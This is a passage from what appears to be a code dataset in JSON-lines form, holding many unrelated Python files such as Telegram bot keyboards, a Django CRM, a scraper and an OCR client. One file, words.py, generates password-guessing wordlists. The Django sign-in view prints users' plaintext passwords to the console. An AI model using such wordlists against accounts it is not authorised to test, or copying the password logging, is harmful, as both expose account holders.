item_edit_delete(item_id, category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Да, удалить\", callback_data=f\"item_delete:yes:{item_id}:{category_id}:{remover}\"),\n ikb(\"✅ Нет, отменить\", callback_data=f\"item_delete:not:{item_id}:{category_id}:{remover}\")\n )\n return keyboard\n\n# Отмена изменения позиции и возвращение\ndef item_edit_cancel(position_id, category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Отменить\", callback_data=f\"item_edit_open:{position_id}:{category_id}:{remover}\"),\n )\n return keyboard\n\n\ndef item_edit_clear_all(item_id, category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Да, удалить\", callback_data=f\"item_clear:yes:{item_id}:{category_id}:{remover}\"),\n ikb(\"✅ Нет, отменить\", callback_data=f\"item_clear:not:{item_id}:{category_id}:{remover}\")\n )\n\n return keyboard\n\n\n\ndef alerts_confirm():\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"✅\", callback_data=f\"alerts_confirm:yes\"),\n ikb(\"❌\", callback_data=f\"alerts_confirm:no\")\n )\n return keyboard\n\ndef item_edit_promocode_open(item_id):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"✅\", callback_data=f\"promocode:yes:{item_id}\"),\n ikb(\"❌\", callback_data=f\"promocode:no:{item_id}\")\n )\n return keyboard\n\ndef promocode_back():\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"Назад ⬅️\", callback_data=f\"back_promocode\"),\n )\n return keyboard\n\ndef promocode_delete(promocode_id):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"Удалить ❌\", callback_data=f\"delete_promocode:yes:{promocode_id}\"),\n ikb(\"Назад ⬅️\", callback_data=f\"delete_promocode:no\")\n )\n return keyboard\n\n","repo_name":"ProstoMishanya32/TGBot_shop_keys","sub_path":"admin_panel/bot/modules/keyboards/inline_admin.py","file_name":"inline_admin.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72638444355","text":"from datetime import datetime\nimport itertools\n\ndef replace_special_characters(words: str):\n \"\"\"\n Substitui caracteres especiais de uma string por caracteres comuns\n\n Args:\n words (str): Entrada a ser analisada\n\n Returns:\n str: Entrada com caracteres especiais substituidos\n \"\"\"\n words = words.replace('ç', 'c')\n words = words.replace('á', 'a').replace('à', 'a').replace('ã', 'a').replace('â', 'a')\n words = words.replace('é', 'e').replace('ê', 'e')\n words = words.replace('í', 'i').replace('î', 'i')\n words = words.replace('ó', 'o').replace('õ', 'o').replace('ô', 'o')\n words = words.replace('ú', 'u').replace('û', 'u')\n words = words.replace('_', ' ').replace('-', ' ')\n \n return words\n\ndef get_permutations(words: list):\n \"\"\"\n Obtém todas as permutações possíveis das palavras em uma lista e seus acrônimos\n\n Args:\n words (list): Lista de palavras\n\n Returns:\n list, list: Lista de acrônimo das permutações e lista das permutações das palavras em `words`\n \"\"\"\n \n permutations_acronym_list = []\n permutations_list = []\n \n for k in range(1, len(words) + 1):\n new_list = list(itertools.permutations(words, k))\n permutations_acronym_list.append(new_list[0])\n permutations_list += new_list\n \n return [permutations_acronym for permutations_acronym in permutations_acronym_list], list(set([''.join(words_permutation) for words_permutation in permutations_list]))\n\ndef get_abbreviations(words: list):\n \"\"\"\n Obtém abreviações das palavras com 6 caracteres ou mais em uma lista\n\n Args:\n words (list): Lista de palavras\n\n Returns:\n list: Lista de abreviações (primeiros 4 caracteres) das palavras com 6 caracteres ou mais em `words`\n \"\"\"\n \n return [word[:4] for word in words if len(word) > 5]\n\ndef get_large_words(words: list):\n \"\"\"\n Remove palavras pequenas das palavras dadas como entrada\n\n Args:\n words (list): Palavras dadas como entrada\n\n Returns:\n list: Lista de palavras dadas como entrada com mais de 3 caracteres\n \"\"\"\n \n return [word for word in words if len(word) > 3]\n\ndef get_acronym(words: list):\n \"\"\"\n Gera acrônimos a partir das palavras dadas como entrada\n\n Args:\n words (list): Lista de strings contendo as palavras dadas como entrada\n\n Returns:\n str: Acrônimo das palavras dadas como entrada\n \"\"\"\n return ''.join([word[0] for word in words])\n\ndef generate_number_sequences(word: str):\n \"\"\"\n Gera sequências numéricas.\n \"\"\"\n \n # Geração de 7 sequências numéricas ordenadas de tamanho 4\n for i in range(7):\n output_file.write(word + ''.join([str(number) for number in (list(range(i, i + 4)))]) + '\\n')\n \n # Geração de 6 sequências numéricas ordenadas de tamanho 5\n for i in range(6):\n output_file.write(word + ''.join([str(number) for number in (list(range(i, i + 5)))]) + '\\n')\n \n # Geração de 5 sequências numéricas ordenadas de tamanho 6\n for i in range(5):\n output_file.write(word + ''.join([str(number) for number in (list(range(i, i + 6)))]) + '\\n')\n\ndef main():\n print(\"Digite as palavras de entrada:\")\n input_string = input()\n input_string = replace_special_characters(input_string)\n input_words = input_string.split()\n \n output_file_name = 'wordlist_' + datetime.now().strftime(\"%Y%m%d_%H%M%S\") + '.txt'\n global output_file\n output_file = open(output_file_name, mode='w')\n \n # Obtenção de palavras grandes\n large_words = get_large_words(input_words)\n \n # Geração de acrônimo de todas as palavras da entrada, caso exista palavras pequenas\n if len(input_words) != len(large_words):\n acronym = get_acronym(input_words)\n output_file.write(acronym + '\\n')\n \n # Geração de acrônimo e permutações das palavras grandes da entrada\n permutations_acronym_list, words_permutations = get_permutations(large_words)\n \n for permutations_acronym in permutations_acronym_list:\n large_words_acronym = get_acronym(permutations_acronym)\n output_file.write(large_words_acronym + '\\n')\n \n for words_permutation in words_permutations:\n output_file.write(words_permutation + '\\n')\n \n # Geração de palavras da entrada sem espaços, caso exista palavras pequenas\n if len(input_words) != len(large_words):\n no_whitespace_entry = input_string.replace(' ', '')\n output_file.write(no_whitespace_entry + '\\n')\n \n # Geração de abreviações das palavras grandes da entrada\n abbreviations = get_abbreviations(large_words)\n \n # Geração de permutações das abreviações\n _, abbreviations_permutations = get_permutations(abbreviations)\n for abbreviations_permutation in abbreviations_permutations:\n output_file.write(abbreviations_permutation + '\\n')\n\n \n # Associação das permutações de palavras à sequências numéricas\n for words_permutation in words_permutations:\n generate_number_sequences(words_permutation)\n \n # Associação do acrônimo de todas as palavras da entrada à sequências numéricas, caso exista palavras pequenas\n if len(input_words) != len(large_words):\n generate_number_sequences(acronym)\n \n # Associação do acrônimo das palavras grandes à sequências numéricas\n if large_words:\n generate_number_sequences(large_words_acronym)\n \n # Associação das abreviações das palavras à sequências numéricas\n for abbreviations_permutation in abbreviations_permutations:\n generate_number_sequences(abbreviations_permutation)\n \n # Associação das palavras da entrada sem espaços à sequências numéricas, caso exista palavras pequenas\n if len(input_words) != len(large_words):\n generate_number_sequences(no_whitespace_entry)\n \n output_file.close()\n \n print('\\nPalavras geradas e armazenadas em ' + output_file_name)\n\nmain()\n","repo_name":"hernandesmacedo/word-list-generator","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35811592239","text":"from django.shortcuts import render, redirect\nfrom crm.forms import EmployeeForm,EmployeModelForm,RegistrationForm,LoginForm\nfrom django.views.generic import View\nfrom crm.models import Employees\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.utils.decorators import method_decorator\n\ndef signin_required(fn):\n def wrapper(request,*args,**kwargs):\n if not request.user.is_authenticated:\n messages.error(request,\"invalid session\")\n return redirect(\"signin\")\n else:\n return fn(request,*args,**kwargs)\n return wrapper\n\n\n@method_decorator(signin_required,name=\"dispatch\")\nclass EmployeeCreateView(View):\n def get(self,request,*args,**kwargs):\n form=EmployeModelForm()\n return render(request,\"emp_add.html\",{\"form\":form})\n def post(self,request,*args,**kwargs):\n form=EmployeModelForm(request.POST,files=request.FILES)\n if form.is_valid():\n form.save()\n messages.success(request,\"Added succesfully\")\n # Employees.objects.create(**form.cleaned_data)\n print(\"created\")\n return render(request,\"emp_add.html\",{\"form\":form})\n else:\n messages.error(request,\"failed to create employee\")\n return render(request,\"emp_add.html\",{\"form\":form})\n \n@method_decorator(signin_required,name=\"dispatch\") \nclass EmployeesListView(View):\n def get(self,request,*args,**kwargs):\n qs=Employees.objects.all()\n department=Employees.objects.all().values_list(\"department\",flat=True).distinct()\n print(department)\n if \"department\" in request.GET:\n dept=request.GET.get(\"department\")\n qs=qs.filter(department__iexact=dept)\n return render(request,\"emp_list.html\",{\"data\":qs,\"department\":department})\n def post(self,request,*args,**kwargs):\n name=request.POST.get(\"box\")\n qs=Employees.objects.filter(name__icontains=name)\n return render(request,\"emp_list.html\",{\"data\":qs})\n\n@method_decorator(signin_required,name=\"dispatch\")\nclass EmployeeDetailView(View):\n def get(self,request,*args,**kwargs):\n id=kwargs.get(\"pk\")\n qs=Employees.objects.get(id=id)\n return render(request,\"emp_details.html\",{\"data\":qs})\n\n@method_decorator(signin_required,name=\"dispatch\")\nclass EmployeeDeleteView(View):\n def get(self,request,*args,**kwargs):\n id=kwargs.get(\"pk\")\n Employees.objects.get(id=id).delete()\n messages.success(request,\"employee removed\")\n return redirect(\"emp-all\")\n\n@method_decorator(signin_required,name=\"dispatch\")\nclass EmployeeUpdateView(View):\n def get(self,request,*args,**kwargs):\n id=kwargs.get(\"pk\")\n obj=Employees.objects.get(id=id)\n form=EmployeModelForm(instance=obj)\n return render(request,\"emp_edit.html\",{\"form\":form})\n def post(self,request,*args,**kwargs):\n id=kwargs.get(\"pk\")\n obj=Employees.objects.get(id=id)\n form=EmployeModelForm(request.POST,instance=obj,files=request.FILES)\n if form.is_valid():\n form.save()\n messages.success(request,\"employee changed\")\n return redirect(\"emp-all\")\n else:\n messages.error(request,\"failed to change employee\")\n return render(request,\"emp_edit.html\",{\"form\":form})\n \n\nclass SignUpView(View):\n def get(self,request,*args,**kwargs):\n form=RegistrationForm()\n return render(request,\"register.html\",{\"form\":form})\n \n def post(self,request,*args,**kwargs):\n form=RegistrationForm(request.POST)\n if form.is_valid():\n User.objects.create_user(**form.cleaned_data) \n # for encrypting\n print(\"saved\")\n messages.success(request,\"account has been created\")\n return render(request,\"register.html\",{\"form\":form})\n else:\n print(\"failed\")\n messages.error(request,\"failed to create account\")\n return render(request,\"register.html\",{\"form\":form})\n\nclass SignInView(View):\n def get(self,request,*args,**kwargs):\n form=LoginForm()\n return render(request,\"login.html\",{\"form\":form})\n def post(self,request,*args,**kwargs):\n form=LoginForm(request.POST)\n if form.is_valid():\n user_name=form.cleaned_data.get(\"username\")\n pwd=form.cleaned_data.get(\"password\")\n print(user_name,pwd)\n user_obj=authenticate(request,username=user_name,password=pwd)\n if user_obj:\n print(\"valid\")\n login(request,user_obj)\n return redirect(\"emp-all\")\n messages.error(request,\"invalid credential\")\n return render(request,\"login.html\",{\"form\":form})\n\n\n@method_decorator(signin_required,name=\"dispatch\")\nclass SignOutView(View):\n def get(self,request,*args,**kwargs):\n logout(request)\n return redirect(\"signin\")","repo_name":"Nandana1790/crm","sub_path":"crm/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13629962586","text":"import argparse\nimport json\nimport os\nimport socketserver\nimport time\n\nfrom engine.modules.utils import receive_json\n\n\nclass Index:\n def __init__(self, path):\n self.storage = {}\n self.path = os.path.join(path, 'index.json')\n if os.path.exists(self.path):\n self._load()\n\n def _load(self):\n with open(self.path) as index:\n self.storage = json.load(index)\n\n def _save(self):\n with open(self.path, 'w') as index:\n json.dump(self.storage, index)\n\n def create(self, data):\n for entry in data:\n self.storage[entry['key']] = entry['value']\n self._save()\n\n def delete(self, key):\n self.storage.pop(key, None)\n self._save()\n\n def get(self, key):\n value = self.storage.get(key, {})\n return json.dumps(value)\n\n def update(self, key, value):\n self.storage[key] = value\n self._save()\n\n\nclass TCPHandler(socketserver.BaseRequestHandler):\n def handle(self):\n global INDEX\n request = receive_json(self.request)\n start = time.time()\n\n if request['action'] == 'load':\n INDEX = Index(request['path'])\n self.request.sendall(json.dumps(INDEX.storage).encode())\n elif request['action'] == 'create':\n INDEX.create(request['data'])\n elif request['action'] == 'add':\n INDEX.update(request['key'], request['value'])\n elif request['action'] == 'update':\n INDEX.update(request['key'], request['value'])\n elif request['action'] == 'delete':\n INDEX.delete(request['key'])\n elif request['action'] == 'get':\n self.request.sendall(INDEX.get(request['key']).encode())\n else:\n self.request.sendall(json.dumps({\n 'action': 'error',\n 'message': 'Invalid action.'\n }).encode())\n\n print('Processed action \"%s\" in %.2f seconds' % (request['action'], time.time() - start))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('network')\n args = parser.parse_args()\n\n NETWORK = json.load(open(args.network))\n INDEX = Index('')\n\n server = socketserver.TCPServer((NETWORK['indices']['host'], NETWORK['indices']['port']), TCPHandler)\n server.serve_forever()\n","repo_name":"ealmuina/search-engine","sub_path":"engine/modules/indices.py","file_name":"indices.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33904255811","text":"\n\nfrom mrjob.job import MRJob\nfrom mrjob.step import MRStep\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nfrom nltk import pos_tag\nimport re\nWORD_RE=re.compile(r\"[\\w]+\")\n\nlemmatizer=WordNetLemmatizer()\nstop_words=stopwords.words('english')\n''' \npython 04_top_20_common_adjective.py test.txt\npython 04_top_20_common_adjective.py prep_1.tsv\n\nUWAGA URUCHAMIANIE PLIKU W CHMURZE:\npo dodaniu .mrjob.conf\n\nrunners:\n emr:\n aws_access_key_id:\n aws_secret_access_key: \n region: eu-west-1\n num_core_instances: 4\n bootstrap:\n - sudo pip3 install --user -U nltk singledispatch\n - sudo python3 -m nltk.downloader -d /usr/share/ntlk_data all\n\ndo katalogu C users user\ni usunieciu folderu .aws\n\npython 04_top_20_common_adjective.py -r emr prep_reviews.csv --output-dir=s3://big-data-231/output/job-from-pycharm\n\npython 04_top_20_common_adjective.py -r emr s3://big-data-231/data/prep_reviews.csv --output-dir=s3://big-data-231/output/job-from-pycharm\n\n\npython 04_top_20_common_adjective.py -r emr test.txt --output-dir=s3://big-data-231/output/job-from-pycharm\n\n\n'''\n# import nltk as n\n# n.download('wordnet')\n# n.download('stopwords')\n# n.download('averaged_perceptron_tagger')\n\n\nclass MRFood(MRJob):\n\n def steps(self):\n return[\n MRStep(mapper=self.mapper),\n MRStep(mapper=self.mapper_get_keys,reducer=self.reducer),\n MRStep(mapper=self.mapper_get_1_and_5,reducer=self.reducer_get_20_words)\n ]\n # def maper_init(self):\n # import nltk as n\n # n.download('wordnet')\n # n.download('stopwords')\n # n.download('averaged_perceptron_tagger')\n\n def mapper(self,_,line):\n (Id,ProductId,UserId,ProfileName,HelpfulnessNumerator,HelpfulnessDenominator,\n Score,Time,Summary,Text)= line.split('\\t')\n\n words=WORD_RE.findall(Text)\n #filtering when len word is > 1\n words=filter(lambda word: len(word) > 1,words)\n words=map(str.lower,words) #make lower letters\n words=map(lemmatizer.lemmatize,words) # mice=> mouse\n words=filter(lambda word: word not in stop_words,words)\n\n for word in words:\n if pos_tag([word])[0][1]=='JJ': #two dimensional tuple\n yield Score, word\n\n\n\n def mapper_get_keys(self,key,value):\n #[\"4\", \"good\"] 1\n yield (key,value),1\n\n def reducer(self,key,values):\n yield key, sum(values)\n def mapper_get_1_and_5(self,key,value):\n if key[0]=='1':\n yield key[0],(key[1],value)\n #key[0] is score, key[1] is number of values\n if key[0]=='5':\n yield key[0],(key[1],value)\n\n def reducer_get_20_words(self,key,values):\n results={}\n for value in values:\n results[value[0]]=value[1]\n # i made dict for words with 1 and 5 score and their numbers\n sorted_results=sorted([(val,key) for key,val in results.items()],reverse=True)\n # i made list of words from dict, on first elem is number\n\n\n yield key, sorted_results[:20]\n\nif __name__=='__main__':\n MRFood.run()","repo_name":"Filip-231/Big-data-hadoop-map-reduce","sub_path":"06_food_reviews/04_top_20_common_adjective.py","file_name":"04_top_20_common_adjective.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71303760193","text":"#Make a CLI program that asks the user for an input then prints it out.\r\nprint(\"Enter quit to exit\")\r\n\r\nPrompt = input(\"\\nEnter receipt number to be converted as a GCID:\\n\")\r\nwhile Prompt != \"quit\":\r\n store = Prompt[0:4]\r\n #if the first number of store is a 0, then remove the first number\r\n if store[0] == \"0\":\r\n store = store[1:]\r\n till = Prompt[4:7]\r\n #if the first number of till is a 0, then remove the first number\r\n if till[0] == \"0\":\r\n till = till[1:]\r\n\r\n invoice = Prompt[7:11]\r\n date_ = Prompt[11:21]\r\n #remove the / from the date_ and place the last two numbers at the beginning of the string\r\n date_ = date_.replace(\"/\", \"\")\r\n date_ = date_[-2:] + date_[:-2]\r\n\r\n print(\"==========================\\n\")\r\n print(\"Converted\", store, date_, till, invoice,\"\\n\")\r\n print(\"==========================\\n\")\r\n Prompt = input(\"Enter receipt number to be converted as a GCID:\\n\")\r\n\r\n#0081042634007/05/19\r\n#07/05/19","repo_name":"CarlosR4/GCID-Converter","sub_path":"GCID.py","file_name":"GCID.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"5868099468","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef scrape_catalog(url):\n # Отправляем GET-запрос на первую страницу каталога\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n products = []\n\n # Ищем все элементы товаров на странице\n product_elements = soup.find_all('div', class_='col-lg-4 col-md-6 mb-4')\n for product_element in product_elements:\n # Извлекаем наименование и цену товара\n name = product_element.find('h4', class_='card-title').text.strip()\n price = product_element.find('h5').text.strip()\n\n # Добавляем товар в список\n products.append({'name': name, 'price': price})\n\n # Проверяем наличие следующей страницы каталога\n next_page = soup.find('a', class_='next page-link')\n if next_page:\n # Если следующая страница существует, рекурсивно вызываем функцию для нее\n next_page_url = next_page['href']\n products += scrape_catalog(next_page_url)\n\n return products\n\nif __name__ == '__main__':\n url = 'https://scrapingclub.com/exercise/list_basic/'\n catalog = scrape_catalog(url)\n\n # Выводим список товаров\n for product in catalog:\n print(f\"Наименование: {product['name']}, Цена: {product['price']}\")\n","repo_name":"juliamin316/d_z","sub_path":"dz_4/prices.py","file_name":"prices.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43020071","text":"import pandas as pd\n\n# Leer el archivo CSV\ndf = pd.read_csv('Data Proyecto 2 Impar/scripts/datos_personas.csv')\n\n# Obtener los datos como listas\nnombres = df[\"Nombre\"].tolist()\napellidos = df[\"Apellido\"].tolist()\nedades = df[\"Edad\"].tolist()\n\n# Imprimir los datos en un formato adecuado para PHP\nprint(\"\\n\".join([f\"{nombre},{apellido},{edad}\" for nombre, apellido, edad in zip(nombres, apellidos, edades)]))\n","repo_name":"VicenteGarayR/Gatos-de-base","sub_path":"Data Proyecto 2 Impar/scripts/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28878171161","text":"\"\"\"Bite 178. Parse PyBites blog git commit log.\"\"\"\n\nimport os\nimport re\nfrom collections import Counter, defaultdict\nfrom typing import Tuple\nfrom urllib.request import urlretrieve\n\nfrom dateutil.parser import parse\n\ncommits = os.path.join(os.getenv(\"TMP\", \"/tmp\"), \"commits\")\nurlretrieve(\"https://bites-data.s3.us-east-2.amazonaws.com/git_log_stat.out\", commits)\n\n# you can use this constant as key to the yyyymm:count dict\nYEAR_MONTH = \"{y}-{m:02d}\"\n\n\ndef tot_changes(changes: str) -> int:\n \"\"\"Add deletions and insertions.\"\"\"\n\n insertions_pat = re.compile(r\"(\\d+) insertion\")\n deletions_pat = re.compile(r\"(\\d+) deletion\")\n\n insertions = insertions_pat.search(changes)\n insertions = int(insertions.group(1)) if insertions else 0\n deletions = deletions_pat.search(changes)\n deletions = int(deletions.group(1)) if deletions else 0\n return insertions + deletions\n\n\ndef get_min_max_amount_of_commits(\n commit_log: str = commits, year: int = None\n) -> Tuple[str, str]:\n \"\"\"Get the months with fewest and most commits.\n\n Calculate the amount of inserts / deletes per month from the\n provided commit log.\n\n Takes optional year arg, if provided only look at lines for\n that year, if not, use the entire file.\n\n Returns a tuple of (least_active_month, most_active_month)\n \"\"\"\n log_pat = re.compile(r\"\\S+:\\s+(.*)\\s+\\|\\s+.*changed, (.*)$\")\n # 31 insertions(+), 2 deletions(-)\n nchanges_per_month = defaultdict(int)\n with open(commit_log, encoding=\"utf-8\") as f_in:\n for line in f_in:\n match = log_pat.match(line)\n date, changes = match.group(1, 2)\n ym_date = parse(date).strftime(\"%Y-%m\")\n if year and ym_date[:4] != str(year):\n continue\n nchanges = tot_changes(changes)\n nchanges_per_month[ym_date] += nchanges\n changes_per_month = Counter(nchanges_per_month)\n least = changes_per_month.most_common()[-1]\n most = changes_per_month.most_common(1)[0]\n return (least[0], most[0])\n","repo_name":"jsh/pybites","sub_path":"178/commits.py","file_name":"commits.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22479589155","text":"# !/usr/bin/python3\n# coding=utf-8\n# @Time : 19-3-10 上午9:58\n# @Author : Paul\n# @Email : 287618817@qq.com\n# @File : config.py\n# @Software: PyCharm\n\n'''\nHTTPServer配置文件,用于填写基本的必要信息\n'''\n\n# 配置服务器地址\nHOST = '0.0.0.0'\nPORT = 7777\nADDR = (HOST, PORT)\n\n# debug 设置True表示调试\nDEBUG = True\n\n# 配合的web Frame地址\nframe_ip = '127.0.0.1'\nframe_port = 8080\nframe_address = (frame_ip, frame_port)","repo_name":"yx375607709/MyProject","sub_path":"HTTPServer/HTTPServer_v3/HTTPServer/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23627861441","text":"# the function to calculate the GCD\r\ndef gcd(n, d):\r\n\twhile d != 0:\r\n\t\tt = d\r\n\t\td = n%d\r\n\t\tn = t\r\n\treturn n\r\n\r\n# the function to calculate the LCM\r\ndef lcm(num1, num2):\r\n result = num1*num2/gcd(num1,num2)\r\n return result\r\n\r\nfilename = input(\"Enter file name of test case: \")\r\nrfname = input(\"Enter result file name: \")\r\nfile = open(filename)\r\n\r\nipt = file.readlines()\r\nls = int(ipt[0])\r\n\r\nfor n in range(len(ipt)):\r\n\tipt[n] = ipt[n][:-1]\r\n\r\nres = []\r\n\r\nn=1\r\nwhile n=\"1\":\r\n\t\tres.append(1)\r\n\t\tn+=2\r\n\t\tcontinue\r\n\t\t\r\n\tr=1\r\n\tfor i in b:\r\n\t\tr=lcm(r,int(i))\r\n\t\r\n\ts=0\r\n\tfor i in range(int(a[1]),int(a[2])+1):\r\n\t\taa=[]\r\n\t\tfor j in b:\r\n\t\t\tif i%int(j) == 0 or int(j)%i == 0:\r\n\t\t\t\taa.append(1)\r\n\t\tif len(aa) == len(b):\r\n\t\t\ts=1\r\n\t\t\tres.append(i)\r\n\t\t\tbreak\r\n\t\r\n\tif s==0:\r\n\t\tres.append(\"NO\")\r\n\t\t\r\n\tn+=2\r\n\t\r\ntostr = \"\"\r\nfor n in range(len(res)):\r\n\ttostr+=\"Case #\" + str(n+1) + \": \" + str(res[n]) + \"\\n\"\r\n\t\r\nrfile = open(rfname, 'w')\r\nrfile.write(tostr[:-1])\r\ns=input(\"Die Zeit ist um.\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_86/198.py","file_name":"198.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17645564998","text":"from azure.cognitiveservices.vision.computervision import ComputerVisionClient\nfrom msrest.authentication import CognitiveServicesCredentials\nfrom azure.cognitiveservices.vision.computervision.models import OperationStatusCodes\nimport time,os\n\nurl = os.environ['ACCOUNT_URL']\nkey = os.environ['ACCOUNT_KEY_VISION']\n\ncredentials = CognitiveServicesCredentials(key)\nclient = ComputerVisionClient(\n \n endpoint=url,\n credentials=credentials\n)\n\ndef consumeVision(image_paths): \n rawHttpResponse = client.read(image_paths, language=\"en\", raw=True)\n time.sleep(2)\n numberOfCharsInOperationId = 36\n operationLocation = rawHttpResponse.headers[\"Operation-Location\"]\n idLocation = len(operationLocation) - numberOfCharsInOperationId\n operationId = operationLocation[idLocation:]\n # Retrieve the results \n while True:\n read_result = client.get_read_result(operationId)\n if read_result.status.lower() not in ['notstarted', 'running']:\n break\n time.sleep(1)\n # Get the detected text\n if read_result.status == OperationStatusCodes.succeeded:\n return read_result.analyze_result","repo_name":"RAMAVEDA/Intelligent-Extractor","sub_path":"source/BackEnd/MongoDB/msvisionControl.py","file_name":"msvisionControl.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30081808971","text":"'''\nTARGET SUM --> https://leetcode.com/problems/target-sum/\nYou are given a list of non-negative integers, a1, a2, ..., an, and a target, S. Now you have 2 symbols + and -. For each integer, you should choose one from + and - as its new symbol.\n\nFind out how many ways to assign symbols to make sum of integers equal to target S.\n\nExample 1:\n\nInput: nums is [1, 1, 1, 1, 1], S is 3. \nOutput: 5\nExplanation: \n\n-1+1+1+1+1 = 3\n+1-1+1+1+1 = 3\n+1+1-1+1+1 = 3\n+1+1+1-1+1 = 3\n+1+1+1+1-1 = 3\n\nThere are 5 ways to assign symbols to make the sum of nums be target 3.'''\n\nnums=[1,0]\nS=1\ndef kaa(nums, S):\n\n c=0\n for i in nums:\n if i==0:\n c+=1\n \n if S > sum(nums):\n return 0;\n if (S+sum(nums))%2!=0 :\n return 0;\n\n s= (S+sum(nums))//2\n n=len(nums)\n\n k=[[0 for i in range (s+1)] for j in range(n+1)]\n for i in range(n+1):\n k[i][0]=1\n for i in range(1,s+1):\n k[0][i]=0\n\n for i in range(1,n+1):\n for j in range(1,s+1):\n if nums[i-1]==0:\n k[i][j] = k[i-1][j];\n elif nums[i-1]> j:\n k[i][j]= k[i-1][j]\n else:\n k[i][j]= k[i-1][j-nums[i-1]] + k[i-1][j]\n\n return 2**c * k[n][s];\n\nprint(\"Given Array {}\\nNumber of Subset with -/+ given TOTAL SUM {} is {}\".format(nums, S, kaa(nums, S)))\n\n\n'''Basically we have to find 2 subset one for + and another for negative\nso it is a Count number of subset with given difference problem.\n\nLet us assume S as d and +ve_subset as s2 and -ve_subset as s1\nHere we have to find S2-S1 equal to given difference i.e d\n\nSo eq [1]-> s2+(-s1)== s2-s1= d\neq [2]-> s2-(-s1)== s2+s1 = Total SUM\n=>eq[1] + eq[2]\n2s2= difference + Total SUM\ns2 = (difference + Total SUM)/ 2\n\nHence s2 can be found i.e the required SUM'''","repo_name":"zvut/CODING-PRACTICE","sub_path":"TARGET_SUM.py","file_name":"TARGET_SUM.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"36528859213","text":"import sys, os\nimport gi\nimport subprocess\ngi.require_version('Gst', '1.0')\ngi.require_version('Gtk', '3.0')\ngi.require_version('GstVideo', '1.0')\nfrom gi.repository import GObject, Gst, Gtk, Gdk\nfrom gi.repository import GdkX11, GstVideo\nimport time\nimport datetime\nimport configparser\nimport smtplib\nimport threading\n#for post requests\nimport requests\n#for sending emails\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\n#Classes in different files\nfrom pipes import Pipes\nfrom parsettings import parsettings\nfrom continuity import Continuity\n\n#overlays\nimport json\nimport cairo\ngi.require_foreign('cairo')\n#Define this as a constant because it is needed before loading itself\n\nSETTINGS_PATH = '/mixter'\n#SETTINGS_PATH = '/home/administrador/mixter/'\n#SETTINGS_PATH = '/media/sporteiro/Seba/ITER/desarrollo/mixter/local_settings'\n\nclass Mixter(object):\n\tdef __init__(self):\n\t\tprint(\"*******MIXTER LOG: Lanzando Mixter*******\")\n\t\t#Mixter path, useful for saving log or settings\n\t\tself.mixter_path=os.path.dirname(os.path.realpath(__file__))\n\t\t#self.log_path=self.mixter_path+'/mixter.log'\n\t\tself.log_window_message = ''\n\n\t\t#host name, so we can identify it like in sending email alerts\n\t\thostname = subprocess.Popen(\"hostname\", shell=True, stdout=subprocess.PIPE)\n\t\tself.hostname = hostname.stdout.read().decode(\"utf-8\").rstrip()\n\t\t#print(self.hostname)\n\t\t#array of processes so we can check them\n\t\tself.processes=[]\n\t\t#FIXME is this necessary?\n\t\t#contador de errores. puede ser util para desactivar elementos despues de varios intentos, como RTMP, snowmix, etc\n\t\tself.total_errors=0\n\t\t#settings path, this cannot be in settings file, otherwise we would never call him\n\t\t#self.mixter_settings_path = self.mixter_path\n\t\tself.mixter_settings_path = SETTINGS_PATH\n\t\t#FIXME is this necessary?\n\t\t#TODO hace falta? \n\t\tself.ffmpeg_pid = 0 \n\t\tself.snowmix_proc = 'Off'\n\t\t#Pipeline is None when we start\n\t\tself.pipeline = None\n\t\tself.gst_pipeline_state = 'NULL'\n\t\t#load 